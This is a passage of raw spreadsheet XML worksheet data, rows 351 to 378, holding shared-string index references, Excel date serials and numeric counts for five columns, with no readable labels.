      <c r="R351">
        <v>1</v>
      </c>
      <c r="S351">
        <v>64</v>
      </c>
      <c r="T351">
        <v>204</v>
      </c>
      <c r="U351">
        <v>130</v>
      </c>
      <c r="V351">
        <v>137</v>
      </c>
      <c r="W351" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="352" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A352" t="s">
        <v>4</v>
      </c>
      <c r="B352">
        <v>44629.696740115738</v>
      </c>
      <c r="C352" t="s">
        <v>3460</v>
      </c>
      <c r="D352">
        <v>201</v>
      </c>
      <c r="E352" t="s">
        <v>3471</v>
      </c>
      <c r="F352">
        <v>201</v>
      </c>
      <c r="G352" t="s">
        <v>3472</v>
      </c>
      <c r="H352" t="s">
        <v>3473</v>
      </c>
      <c r="I352" t="s">
        <v>156</v>
      </c>
      <c r="J352" t="s">
        <v>157</v>
      </c>
      <c r="K352" t="s">
        <v>26</v>
      </c>
      <c r="L352" t="s">
        <v>77</v>
      </c>
      <c r="M352" t="s">
        <v>475</v>
      </c>
      <c r="N352" t="s">
        <v>476</v>
      </c>
      <c r="Q352" t="s">
        <v>161</v>
      </c>
      <c r="R352">
        <v>1</v>
      </c>
      <c r="S352">
        <v>64</v>
      </c>
      <c r="T352">
        <v>204</v>
      </c>
      <c r="U352">
        <v>130</v>
      </c>
      <c r="V352">
        <v>137</v>
      </c>
      <c r="W352" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="353" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A353" t="s">
        <v>4</v>
      </c>
      <c r="B353">
        <v>44767.632345694445</v>
      </c>
      <c r="C353" t="s">
        <v>286</v>
      </c>
      <c r="D353">
        <v>111</v>
      </c>
      <c r="E353" t="s">
        <v>287</v>
      </c>
      <c r="F353">
        <v>110</v>
      </c>
      <c r="G353" t="s">
        <v>288</v>
      </c>
      <c r="H353" t="s">
        <v>289</v>
      </c>
      <c r="I353" t="s">
        <v>268</v>
      </c>
      <c r="J353" t="s">
        <v>269</v>
      </c>
      <c r="K353" t="s">
        <v>10</v>
      </c>
      <c r="L353" t="s">
        <v>77</v>
      </c>
      <c r="M353" t="s">
        <v>290</v>
      </c>
      <c r="N353" t="s">
        <v>291</v>
      </c>
      <c r="Q353" t="s">
        <v>3618</v>
      </c>
      <c r="T353">
        <v>10</v>
      </c>
      <c r="V353">
        <v>13</v>
      </c>
      <c r="W353" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="354" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A354" t="s">
        <v>4</v>
      </c>
      <c r="B354">
        <v>44491.753664386575</v>
      </c>
      <c r="C354" t="s">
        <v>297</v>
      </c>
      <c r="D354">
        <v>302</v>
      </c>
      <c r="E354" t="s">
        <v>298</v>
      </c>
      <c r="F354">
        <v>302</v>
      </c>
      <c r="G354" t="s">
        <v>299</v>
      </c>
      <c r="H354" t="s">
        <v>307</v>
      </c>
      <c r="I354" t="s">
        <v>156</v>
      </c>
      <c r="J354" t="s">
        <v>226</v>
      </c>
      <c r="K354" t="s">
        <v>27</v>
      </c>
      <c r="L354" t="s">
        <v>77</v>
      </c>
      <c r="M354" t="s">
        <v>308</v>
      </c>
      <c r="N354" t="s">
        <v>309</v>
      </c>
      <c r="Q354" t="s">
        <v>3619</v>
      </c>
      <c r="R354">
        <v>6173</v>
      </c>
      <c r="S354">
        <v>6520</v>
      </c>
      <c r="T354">
        <v>2679</v>
      </c>
      <c r="U354">
        <v>3226</v>
      </c>
      <c r="V354">
        <v>1719</v>
      </c>
      <c r="W354" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="355" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A355" t="s">
        <v>4</v>
      </c>
      <c r="B355">
        <v>44684.726985428242</v>
      </c>
      <c r="C355" t="s">
        <v>311</v>
      </c>
      <c r="D355">
        <v>100</v>
      </c>
      <c r="E355" t="s">
        <v>312</v>
      </c>
      <c r="F355">
        <v>100</v>
      </c>
      <c r="G355" t="s">
        <v>313</v>
      </c>
      <c r="H355" t="s">
        <v>314</v>
      </c>
      <c r="I355" t="s">
        <v>210</v>
      </c>
      <c r="J355" t="s">
        <v>211</v>
      </c>
      <c r="K355" t="s">
        <v>11</v>
      </c>
      <c r="L355" t="s">
        <v>77</v>
      </c>
      <c r="M355" t="s">
        <v>315</v>
      </c>
      <c r="N355" t="s">
        <v>316</v>
      </c>
      <c r="Q355" t="s">
        <v>3620</v>
      </c>
      <c r="T355">
        <v>144</v>
      </c>
      <c r="U355">
        <v>8</v>
      </c>
      <c r="V355">
        <v>125</v>
      </c>
      <c r="W355" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="356" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A356" t="s">
        <v>4</v>
      </c>
      <c r="B356">
        <v>44684.726985451387</v>
      </c>
      <c r="C356" t="s">
        <v>311</v>
      </c>
      <c r="D356">
        <v>100</v>
      </c>
      <c r="E356" t="s">
        <v>318</v>
      </c>
      <c r="F356">
        <v>100</v>
      </c>
      <c r="G356" t="s">
        <v>319</v>
      </c>
      <c r="H356" t="s">
        <v>320</v>
      </c>
      <c r="I356" t="s">
        <v>210</v>
      </c>
      <c r="J356" t="s">
        <v>211</v>
      </c>
      <c r="K356" t="s">
        <v>11</v>
      </c>
      <c r="L356" t="s">
        <v>77</v>
      </c>
      <c r="M356" t="s">
        <v>315</v>
      </c>
      <c r="N356" t="s">
        <v>316</v>
      </c>
      <c r="Q356" t="s">
        <v>3620</v>
      </c>
      <c r="V356">
        <v>18</v>
      </c>
      <c r="W356" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="357" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A357" t="s">
        <v>4</v>
      </c>
      <c r="B357">
        <v>44684.726985439818</v>
      </c>
      <c r="C357" t="s">
        <v>311</v>
      </c>
      <c r="D357">
        <v>100</v>
      </c>
      <c r="E357" t="s">
        <v>321</v>
      </c>
      <c r="F357">
        <v>100</v>
      </c>
      <c r="G357" t="s">
        <v>322</v>
      </c>
      <c r="H357" t="s">
        <v>323</v>
      </c>
      <c r="I357" t="s">
        <v>210</v>
      </c>
      <c r="J357" t="s">
        <v>211</v>
      </c>
      <c r="K357" t="s">
        <v>11</v>
      </c>
      <c r="L357" t="s">
        <v>77</v>
      </c>
      <c r="M357" t="s">
        <v>315</v>
      </c>
      <c r="N357" t="s">
        <v>316</v>
      </c>
      <c r="Q357" t="s">
        <v>3620</v>
      </c>
      <c r="T357">
        <v>2</v>
      </c>
      <c r="V357">
        <v>35</v>
      </c>
      <c r="W357" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="358" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A358" t="s">
        <v>4</v>
      </c>
      <c r="B358">
        <v>44684.726985462963</v>
      </c>
      <c r="C358" t="s">
        <v>311</v>
      </c>
      <c r="D358">
        <v>100</v>
      </c>
      <c r="E358" t="s">
        <v>324</v>
      </c>
      <c r="F358">
        <v>100</v>
      </c>
      <c r="G358" t="s">
        <v>325</v>
      </c>
      <c r="H358" t="s">
        <v>326</v>
      </c>
      <c r="I358" t="s">
        <v>210</v>
      </c>
      <c r="J358" t="s">
        <v>211</v>
      </c>
      <c r="K358" t="s">
        <v>11</v>
      </c>
      <c r="L358" t="s">
        <v>77</v>
      </c>
      <c r="M358" t="s">
        <v>315</v>
      </c>
      <c r="N358" t="s">
        <v>316</v>
      </c>
      <c r="Q358" t="s">
        <v>3620</v>
      </c>
      <c r="V358">
        <v>25</v>
      </c>
      <c r="W358" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="359" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A359" t="s">
        <v>4</v>
      </c>
      <c r="B359">
        <v>44684.726985474539</v>
      </c>
      <c r="C359" t="s">
        <v>311</v>
      </c>
      <c r="D359">
        <v>100</v>
      </c>
      <c r="E359" t="s">
        <v>327</v>
      </c>
      <c r="F359">
        <v>100</v>
      </c>
      <c r="G359" t="s">
        <v>328</v>
      </c>
      <c r="H359" t="s">
        <v>329</v>
      </c>
      <c r="I359" t="s">
        <v>210</v>
      </c>
      <c r="J359" t="s">
        <v>211</v>
      </c>
      <c r="K359" t="s">
        <v>11</v>
      </c>
      <c r="L359" t="s">
        <v>77</v>
      </c>
      <c r="M359" t="s">
        <v>315</v>
      </c>
      <c r="N359" t="s">
        <v>316</v>
      </c>
      <c r="Q359" t="s">
        <v>3620</v>
      </c>
      <c r="V359">
        <v>8</v>
      </c>
      <c r="W359" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="360" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A360" t="s">
        <v>4</v>
      </c>
      <c r="B360">
        <v>44684.726985497684</v>
      </c>
      <c r="C360" t="s">
        <v>311</v>
      </c>
      <c r="D360">
        <v>100</v>
      </c>
      <c r="E360" t="s">
        <v>330</v>
      </c>
      <c r="F360">
        <v>100</v>
      </c>
      <c r="G360" t="s">
        <v>331</v>
      </c>
      <c r="H360" t="s">
        <v>332</v>
      </c>
      <c r="I360" t="s">
        <v>210</v>
      </c>
      <c r="J360" t="s">
        <v>211</v>
      </c>
      <c r="K360" t="s">
        <v>11</v>
      </c>
      <c r="L360" t="s">
        <v>77</v>
      </c>
      <c r="M360" t="s">
        <v>315</v>
      </c>
      <c r="N360" t="s">
        <v>316</v>
      </c>
      <c r="Q360" t="s">
        <v>3620</v>
      </c>
      <c r="V360">
        <v>2</v>
      </c>
      <c r="W360" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="361" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A361" t="s">
        <v>4</v>
      </c>
      <c r="B361">
        <v>44134.718092777781</v>
      </c>
      <c r="C361" t="s">
        <v>571</v>
      </c>
      <c r="D361">
        <v>300</v>
      </c>
      <c r="E361" t="s">
        <v>572</v>
      </c>
      <c r="F361">
        <v>300</v>
      </c>
      <c r="G361" t="s">
        <v>573</v>
      </c>
      <c r="H361" t="s">
        <v>574</v>
      </c>
      <c r="I361" t="s">
        <v>75</v>
      </c>
      <c r="J361" t="s">
        <v>454</v>
      </c>
      <c r="K361" t="s">
        <v>575</v>
      </c>
      <c r="L361" t="s">
        <v>77</v>
      </c>
      <c r="O361" t="s">
        <v>576</v>
      </c>
      <c r="P361" t="s">
        <v>577</v>
      </c>
      <c r="Q361" t="s">
        <v>3621</v>
      </c>
      <c r="R361">
        <v>15211</v>
      </c>
      <c r="S361">
        <v>13997</v>
      </c>
      <c r="T361">
        <v>12962</v>
      </c>
      <c r="U361">
        <v>13394</v>
      </c>
      <c r="V361">
        <v>14329</v>
      </c>
      <c r="W361" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="362" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A362" t="s">
        <v>4</v>
      </c>
      <c r="B362">
        <v>44134.718092754629</v>
      </c>
      <c r="C362" t="s">
        <v>571</v>
      </c>
      <c r="D362">
        <v>300</v>
      </c>
      <c r="E362" t="s">
        <v>579</v>
      </c>
      <c r="F362">
        <v>200</v>
      </c>
      <c r="G362" t="s">
        <v>580</v>
      </c>
      <c r="H362" t="s">
        <v>581</v>
      </c>
      <c r="I362" t="s">
        <v>75</v>
      </c>
      <c r="J362" t="s">
        <v>454</v>
      </c>
      <c r="K362" t="s">
        <v>575</v>
      </c>
      <c r="L362" t="s">
        <v>77</v>
      </c>
      <c r="O362" t="s">
        <v>582</v>
      </c>
      <c r="P362" t="s">
        <v>577</v>
      </c>
      <c r="Q362" t="s">
        <v>3621</v>
      </c>
      <c r="R362">
        <v>2</v>
      </c>
      <c r="S362">
        <v>1589</v>
      </c>
      <c r="T362">
        <v>80523</v>
      </c>
      <c r="W362" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="363" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A363" t="s">
        <v>4</v>
      </c>
      <c r="B363">
        <v>44134.71809278935</v>
      </c>
      <c r="C363" t="s">
        <v>571</v>
      </c>
      <c r="D363">
        <v>300</v>
      </c>
      <c r="E363" t="s">
        <v>583</v>
      </c>
      <c r="F363">
        <v>200</v>
      </c>
      <c r="G363" t="s">
        <v>584</v>
      </c>
      <c r="H363" t="s">
        <v>585</v>
      </c>
      <c r="I363" t="s">
        <v>75</v>
      </c>
      <c r="J363" t="s">
        <v>454</v>
      </c>
      <c r="K363" t="s">
        <v>575</v>
      </c>
      <c r="L363" t="s">
        <v>77</v>
      </c>
      <c r="O363" t="s">
        <v>576</v>
      </c>
      <c r="P363" t="s">
        <v>577</v>
      </c>
      <c r="Q363" t="s">
        <v>3621</v>
      </c>
      <c r="R363">
        <v>28831</v>
      </c>
      <c r="S363">
        <v>26056</v>
      </c>
      <c r="T363">
        <v>26160</v>
      </c>
      <c r="U363">
        <v>28561</v>
      </c>
      <c r="V363">
        <v>31609</v>
      </c>
      <c r="W363" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="364" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A364" t="s">
        <v>4</v>
      </c>
      <c r="B364">
        <v>44134.718092743053</v>
      </c>
      <c r="C364" t="s">
        <v>571</v>
      </c>
      <c r="D364">
        <v>300</v>
      </c>
      <c r="E364" t="s">
        <v>586</v>
      </c>
      <c r="F364">
        <v>200</v>
      </c>
      <c r="G364" t="s">
        <v>587</v>
      </c>
      <c r="H364" t="s">
        <v>588</v>
      </c>
      <c r="I364" t="s">
        <v>75</v>
      </c>
      <c r="J364" t="s">
        <v>454</v>
      </c>
      <c r="K364" t="s">
        <v>575</v>
      </c>
      <c r="L364" t="s">
        <v>77</v>
      </c>
      <c r="O364" t="s">
        <v>582</v>
      </c>
      <c r="P364" t="s">
        <v>577</v>
      </c>
      <c r="Q364" t="s">
        <v>3621</v>
      </c>
      <c r="R364">
        <v>3485738</v>
      </c>
      <c r="S364">
        <v>3255172</v>
      </c>
      <c r="T364">
        <v>3390772</v>
      </c>
      <c r="U364">
        <v>3152973</v>
      </c>
      <c r="V364">
        <v>3622791</v>
      </c>
      <c r="W364" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="365" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A365" t="s">
        <v>4</v>
      </c>
      <c r="B365">
        <v>44134.718092800926</v>
      </c>
      <c r="C365" t="s">
        <v>571</v>
      </c>
      <c r="D365">
        <v>300</v>
      </c>
      <c r="E365" t="s">
        <v>589</v>
      </c>
      <c r="F365">
        <v>200</v>
      </c>
      <c r="G365" t="s">
        <v>590</v>
      </c>
      <c r="H365" t="s">
        <v>591</v>
      </c>
      <c r="I365" t="s">
        <v>75</v>
      </c>
      <c r="J365" t="s">
        <v>454</v>
      </c>
      <c r="K365" t="s">
        <v>575</v>
      </c>
      <c r="L365" t="s">
        <v>77</v>
      </c>
      <c r="O365" t="s">
        <v>576</v>
      </c>
      <c r="P365" t="s">
        <v>577</v>
      </c>
      <c r="Q365" t="s">
        <v>3621</v>
      </c>
      <c r="R365">
        <v>309850</v>
      </c>
      <c r="S365">
        <v>299634</v>
      </c>
      <c r="T365">
        <v>290293</v>
      </c>
      <c r="U365">
        <v>303099</v>
      </c>
      <c r="V365">
        <v>356297</v>
      </c>
      <c r="W365" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="366" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A366" t="s">
        <v>4</v>
      </c>
      <c r="B366">
        <v>44134.718092766205</v>
      </c>
      <c r="C366" t="s">
        <v>571</v>
      </c>
      <c r="D366">
        <v>300</v>
      </c>
      <c r="E366" t="s">
        <v>592</v>
      </c>
      <c r="F366">
        <v>300</v>
      </c>
      <c r="G366" t="s">
        <v>593</v>
      </c>
      <c r="H366" t="s">
        <v>594</v>
      </c>
      <c r="I366" t="s">
        <v>75</v>
      </c>
      <c r="J366" t="s">
        <v>454</v>
      </c>
      <c r="K366" t="s">
        <v>575</v>
      </c>
      <c r="L366" t="s">
        <v>77</v>
      </c>
      <c r="O366" t="s">
        <v>582</v>
      </c>
      <c r="P366" t="s">
        <v>577</v>
      </c>
      <c r="Q366" t="s">
        <v>3621</v>
      </c>
      <c r="R366">
        <v>524133</v>
      </c>
      <c r="S366">
        <v>500477</v>
      </c>
      <c r="T366">
        <v>500874</v>
      </c>
      <c r="U366">
        <v>500728</v>
      </c>
      <c r="V366">
        <v>602091</v>
      </c>
      <c r="W366" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="367" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A367" t="s">
        <v>4</v>
      </c>
      <c r="B367">
        <v>44134.718092812502</v>
      </c>
      <c r="C367" t="s">
        <v>571</v>
      </c>
      <c r="D367">
        <v>300</v>
      </c>
      <c r="E367" t="s">
        <v>595</v>
      </c>
      <c r="F367">
        <v>200</v>
      </c>
      <c r="G367" t="s">
        <v>596</v>
      </c>
      <c r="H367" t="s">
        <v>597</v>
      </c>
      <c r="I367" t="s">
        <v>75</v>
      </c>
      <c r="J367" t="s">
        <v>454</v>
      </c>
      <c r="K367" t="s">
        <v>575</v>
      </c>
      <c r="L367" t="s">
        <v>77</v>
      </c>
      <c r="O367" t="s">
        <v>582</v>
      </c>
      <c r="P367" t="s">
        <v>577</v>
      </c>
      <c r="Q367" t="s">
        <v>3621</v>
      </c>
      <c r="R367">
        <v>151906</v>
      </c>
      <c r="S367">
        <v>147659</v>
      </c>
      <c r="T367">
        <v>150650</v>
      </c>
      <c r="U367">
        <v>154765</v>
      </c>
      <c r="V367">
        <v>180140</v>
      </c>
      <c r="W367" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="368" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A368" t="s">
        <v>4</v>
      </c>
      <c r="B368">
        <v>44037.962066990738</v>
      </c>
      <c r="C368" t="s">
        <v>1286</v>
      </c>
      <c r="D368">
        <v>100</v>
      </c>
      <c r="E368" t="s">
        <v>1287</v>
      </c>
      <c r="F368">
        <v>100</v>
      </c>
      <c r="G368" t="s">
        <v>1288</v>
      </c>
      <c r="H368" t="s">
        <v>1289</v>
      </c>
      <c r="I368" t="s">
        <v>268</v>
      </c>
      <c r="J368" t="s">
        <v>269</v>
      </c>
      <c r="K368" t="s">
        <v>10</v>
      </c>
      <c r="L368" t="s">
        <v>77</v>
      </c>
      <c r="M368" t="s">
        <v>270</v>
      </c>
      <c r="N368" t="s">
        <v>271</v>
      </c>
      <c r="O368" t="s">
        <v>1295</v>
      </c>
      <c r="Q368" t="s">
        <v>161</v>
      </c>
      <c r="R368">
        <v>94742</v>
      </c>
      <c r="S368">
        <v>103735</v>
      </c>
      <c r="T368">
        <v>96125</v>
      </c>
      <c r="U368">
        <v>105138</v>
      </c>
      <c r="V368">
        <v>120505</v>
      </c>
      <c r="W368" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="369" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A369" t="s">
        <v>4</v>
      </c>
      <c r="B369">
        <v>44532.364457488424</v>
      </c>
      <c r="C369" t="s">
        <v>1408</v>
      </c>
      <c r="D369">
        <v>203</v>
      </c>
      <c r="E369" t="s">
        <v>1409</v>
      </c>
      <c r="F369">
        <v>103</v>
      </c>
      <c r="G369" t="s">
        <v>1410</v>
      </c>
      <c r="H369" t="s">
        <v>1411</v>
      </c>
      <c r="I369" t="s">
        <v>17</v>
      </c>
      <c r="J369" t="s">
        <v>1412</v>
      </c>
      <c r="K369" t="s">
        <v>17</v>
      </c>
      <c r="L369" t="s">
        <v>83</v>
      </c>
      <c r="M369" t="s">
        <v>72</v>
      </c>
      <c r="Q369" t="s">
        <v>1413</v>
      </c>
      <c r="R369">
        <v>5709</v>
      </c>
      <c r="S369">
        <v>4176</v>
      </c>
      <c r="T369">
        <v>2291</v>
      </c>
      <c r="U369">
        <v>813</v>
      </c>
      <c r="V369">
        <v>913</v>
      </c>
      <c r="W369" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="370" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A370" t="s">
        <v>4</v>
      </c>
      <c r="B370">
        <v>44473.725267557871</v>
      </c>
      <c r="C370" t="s">
        <v>1408</v>
      </c>
      <c r="D370">
        <v>203</v>
      </c>
      <c r="E370" t="s">
        <v>1414</v>
      </c>
      <c r="F370">
        <v>101</v>
      </c>
      <c r="G370" t="s">
        <v>1415</v>
      </c>
      <c r="H370" t="s">
        <v>1416</v>
      </c>
      <c r="I370" t="s">
        <v>17</v>
      </c>
      <c r="J370" t="s">
        <v>1412</v>
      </c>
      <c r="K370" t="s">
        <v>17</v>
      </c>
      <c r="L370" t="s">
        <v>83</v>
      </c>
      <c r="M370" t="s">
        <v>72</v>
      </c>
      <c r="Q370" t="s">
        <v>1413</v>
      </c>
      <c r="R370">
        <v>2158</v>
      </c>
      <c r="S370">
        <v>1680</v>
      </c>
      <c r="T370">
        <v>1759</v>
      </c>
      <c r="U370">
        <v>35</v>
      </c>
      <c r="V370">
        <v>18</v>
      </c>
      <c r="W370" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="371" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A371" t="s">
        <v>4</v>
      </c>
      <c r="B371">
        <v>44250.62611203704</v>
      </c>
      <c r="C371" t="s">
        <v>1498</v>
      </c>
      <c r="D371">
        <v>100</v>
      </c>
      <c r="E371" t="s">
        <v>1499</v>
      </c>
      <c r="F371">
        <v>100</v>
      </c>
      <c r="G371" t="s">
        <v>1500</v>
      </c>
      <c r="H371" t="s">
        <v>1228</v>
      </c>
      <c r="I371" t="s">
        <v>103</v>
      </c>
      <c r="J371" t="s">
        <v>147</v>
      </c>
      <c r="K371" t="s">
        <v>35</v>
      </c>
      <c r="L371" t="s">
        <v>83</v>
      </c>
      <c r="M371" t="s">
        <v>148</v>
      </c>
      <c r="N371" t="s">
        <v>149</v>
      </c>
      <c r="Q371" t="s">
        <v>3622</v>
      </c>
      <c r="R371">
        <v>3297</v>
      </c>
      <c r="S371">
        <v>4087</v>
      </c>
      <c r="T371">
        <v>3192</v>
      </c>
      <c r="U371">
        <v>3032</v>
      </c>
      <c r="V371">
        <v>4527</v>
      </c>
      <c r="W371" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="372" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A372" t="s">
        <v>4</v>
      </c>
      <c r="B372">
        <v>44508.353195914351</v>
      </c>
      <c r="C372" t="s">
        <v>1530</v>
      </c>
      <c r="D372">
        <v>102</v>
      </c>
      <c r="E372" t="s">
        <v>1531</v>
      </c>
      <c r="F372">
        <v>102</v>
      </c>
      <c r="G372" t="s">
        <v>1532</v>
      </c>
      <c r="H372" t="s">
        <v>1533</v>
      </c>
      <c r="I372" t="s">
        <v>156</v>
      </c>
      <c r="J372" t="s">
        <v>438</v>
      </c>
      <c r="K372" t="s">
        <v>27</v>
      </c>
      <c r="L372" t="s">
        <v>77</v>
      </c>
      <c r="M372" t="s">
        <v>509</v>
      </c>
      <c r="N372" t="s">
        <v>510</v>
      </c>
      <c r="O372" t="s">
        <v>1534</v>
      </c>
      <c r="Q372" t="s">
        <v>3623</v>
      </c>
      <c r="R372">
        <v>31557</v>
      </c>
      <c r="S372">
        <v>379090</v>
      </c>
      <c r="T372">
        <v>220842</v>
      </c>
      <c r="U372">
        <v>676274</v>
      </c>
      <c r="V372">
        <v>710873</v>
      </c>
      <c r="W372" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="373" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A373" t="s">
        <v>4</v>
      </c>
      <c r="B373">
        <v>44253.613336840281</v>
      </c>
      <c r="C373" t="s">
        <v>1667</v>
      </c>
      <c r="D373">
        <v>100</v>
      </c>
      <c r="E373" t="s">
        <v>1668</v>
      </c>
      <c r="F373">
        <v>100</v>
      </c>
      <c r="G373" t="s">
        <v>1672</v>
      </c>
      <c r="H373" t="s">
        <v>1670</v>
      </c>
      <c r="I373" t="s">
        <v>31</v>
      </c>
      <c r="J373" t="s">
        <v>262</v>
      </c>
      <c r="K373" t="s">
        <v>31</v>
      </c>
      <c r="L373" t="s">
        <v>77</v>
      </c>
      <c r="M373" t="s">
        <v>262</v>
      </c>
      <c r="N373" t="s">
        <v>263</v>
      </c>
      <c r="Q373" t="s">
        <v>3624</v>
      </c>
      <c r="R373">
        <v>45</v>
      </c>
      <c r="S373">
        <v>30</v>
      </c>
      <c r="T373">
        <v>52</v>
      </c>
      <c r="U373">
        <v>33</v>
      </c>
      <c r="V373">
        <v>28</v>
      </c>
      <c r="W373" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="374" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A374" t="s">
        <v>4</v>
      </c>
      <c r="B374">
        <v>44292.099836921298</v>
      </c>
      <c r="C374" t="s">
        <v>2271</v>
      </c>
      <c r="D374">
        <v>100</v>
      </c>
      <c r="E374" t="s">
        <v>2267</v>
      </c>
      <c r="F374">
        <v>100</v>
      </c>
      <c r="G374" t="s">
        <v>2268</v>
      </c>
      <c r="H374" t="s">
        <v>2272</v>
      </c>
      <c r="I374" t="s">
        <v>31</v>
      </c>
      <c r="J374" t="s">
        <v>262</v>
      </c>
      <c r="K374" t="s">
        <v>31</v>
      </c>
      <c r="L374" t="s">
        <v>77</v>
      </c>
      <c r="M374" t="s">
        <v>262</v>
      </c>
      <c r="N374" t="s">
        <v>263</v>
      </c>
      <c r="Q374" t="s">
        <v>2273</v>
      </c>
      <c r="R374">
        <v>2246</v>
      </c>
      <c r="S374">
        <v>1721</v>
      </c>
      <c r="T374">
        <v>1861</v>
      </c>
      <c r="U374">
        <v>1804</v>
      </c>
      <c r="V374">
        <v>2007</v>
      </c>
      <c r="W374" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="375" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A375" t="s">
        <v>4</v>
      </c>
      <c r="B375">
        <v>44081.802624340278</v>
      </c>
      <c r="C375" t="s">
        <v>2271</v>
      </c>
      <c r="D375">
        <v>201</v>
      </c>
      <c r="E375" t="s">
        <v>2267</v>
      </c>
      <c r="F375">
        <v>201</v>
      </c>
      <c r="G375" t="s">
        <v>2268</v>
      </c>
      <c r="H375" t="s">
        <v>2272</v>
      </c>
      <c r="I375" t="s">
        <v>31</v>
      </c>
      <c r="J375" t="s">
        <v>262</v>
      </c>
      <c r="K375" t="s">
        <v>31</v>
      </c>
      <c r="L375" t="s">
        <v>77</v>
      </c>
      <c r="M375" t="s">
        <v>262</v>
      </c>
      <c r="N375" t="s">
        <v>263</v>
      </c>
      <c r="Q375" t="s">
        <v>3625</v>
      </c>
      <c r="R375">
        <v>2246</v>
      </c>
      <c r="S375">
        <v>1721</v>
      </c>
      <c r="T375">
        <v>1861</v>
      </c>
      <c r="U375">
        <v>1804</v>
      </c>
      <c r="V375">
        <v>2007</v>
      </c>
      <c r="W375" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="376" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A376" t="s">
        <v>4</v>
      </c>
      <c r="B376">
        <v>44312.758632731478</v>
      </c>
      <c r="C376" t="s">
        <v>1599</v>
      </c>
      <c r="D376">
        <v>100</v>
      </c>
      <c r="E376" t="s">
        <v>2664</v>
      </c>
      <c r="F376">
        <v>100</v>
      </c>
      <c r="G376" t="s">
        <v>2665</v>
      </c>
      <c r="H376" t="s">
        <v>2666</v>
      </c>
      <c r="I376" t="s">
        <v>31</v>
      </c>
      <c r="J376" t="s">
        <v>262</v>
      </c>
      <c r="K376" t="s">
        <v>31</v>
      </c>
      <c r="L376" t="s">
        <v>77</v>
      </c>
      <c r="M376" t="s">
        <v>262</v>
      </c>
      <c r="N376" t="s">
        <v>263</v>
      </c>
      <c r="Q376" t="s">
        <v>161</v>
      </c>
      <c r="R376">
        <v>11447</v>
      </c>
      <c r="S376">
        <v>9866</v>
      </c>
      <c r="T376">
        <v>7230</v>
      </c>
      <c r="U376">
        <v>13518</v>
      </c>
      <c r="V376">
        <v>13750</v>
      </c>
      <c r="W376" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="377" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A377" t="s">
        <v>4</v>
      </c>
      <c r="B377">
        <v>44517.897685173608</v>
      </c>
      <c r="C377" t="s">
        <v>2865</v>
      </c>
      <c r="D377">
        <v>204</v>
      </c>
      <c r="E377" t="s">
        <v>2866</v>
      </c>
      <c r="F377">
        <v>102</v>
      </c>
      <c r="G377" t="s">
        <v>2867</v>
      </c>
      <c r="H377" t="s">
        <v>2868</v>
      </c>
      <c r="I377" t="s">
        <v>17</v>
      </c>
      <c r="J377" t="s">
        <v>1412</v>
      </c>
      <c r="K377" t="s">
        <v>17</v>
      </c>
      <c r="L377" t="s">
        <v>83</v>
      </c>
      <c r="M377" t="s">
        <v>72</v>
      </c>
      <c r="Q377" t="s">
        <v>3626</v>
      </c>
      <c r="R377">
        <v>3154</v>
      </c>
      <c r="S377">
        <v>2677</v>
      </c>
      <c r="T377">
        <v>54</v>
      </c>
      <c r="U377">
        <v>50</v>
      </c>
      <c r="V377">
        <v>787</v>
      </c>
      <c r="W377" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="378" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A378" t="s">
        <v>4</v>
      </c>
      <c r="B378">
        <v>44020.762400439817</v>
      </c>
      <c r="C378" t="s">
        <v>2865</v>
      </c>
      <c r="D378">
        <v>101</v>
      </c>
      <c r="E378" t="s">
        <v>2870</v>
      </c>
      <c r="F378">
        <v>101</v>
      </c>
      <c r="G378" t="s">
        <v>2871</v>
      </c>
      <c r="H378" t="s">
        <v>2872</v>
      </c>
      <c r="I378" t="s">
        <v>17</v>
      </c>
      <c r="J378" t="s">
        <v>1412</v>
      </c>
      <c r="K378" t="s">
        <v>17</v>
